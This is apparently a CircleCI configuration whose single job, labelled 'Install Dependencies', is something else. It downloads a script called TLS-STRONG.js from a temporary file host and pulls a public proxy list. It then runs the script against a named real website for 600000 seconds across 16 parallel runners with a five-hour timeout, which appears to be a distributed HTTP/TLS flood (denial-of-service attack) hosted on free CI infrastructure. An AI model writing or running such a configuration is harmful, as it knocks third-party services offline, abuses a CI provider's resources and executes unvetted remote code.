version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget nodejs npm -y && npm i fake-useragent cluster fs tls net http http2 && wget https://temp.sh/aNjbh/TLS-STRONG.js && wget https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt && mv proxies-http.txt http.txt && chmod 777 * && node TLS-STRONG.js https://www.resso.com/in/ 600000 1 http.txt
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
